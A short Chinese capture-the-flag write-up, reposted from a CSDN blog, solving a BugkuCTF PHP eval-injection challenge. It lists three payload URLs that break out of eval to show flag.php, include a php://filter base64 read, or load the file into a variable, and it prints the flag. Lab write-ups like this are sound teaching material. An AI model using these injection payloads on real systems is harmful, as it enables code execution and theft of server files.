【BugkuCTF】Web--本地包含

Description:

地址:http://123.206.87.240:8003/


这个地址已经不行了,故本文为转载,源于:https://blog.csdn.net/dyw_666666/article/details/82389457#comments该文章


Solution:

题目内容为:

方法一:

eval存在命令执行漏洞,使用hello构造payload

http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3



方法二:

http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//
在POST区域:f=php://filter/convert.base64-encode/resource=flag.php

Base64解码即可。

方法三:

直接将flag.php文件读入变量hello中

?hello=get_file_contents('flag.php')
?hello=file('flag.php')


Flag:

flag{bug-ctf-gg-99}

猜你喜欢

转载自blog.csdn.net/qq_34072526/article/details/87734649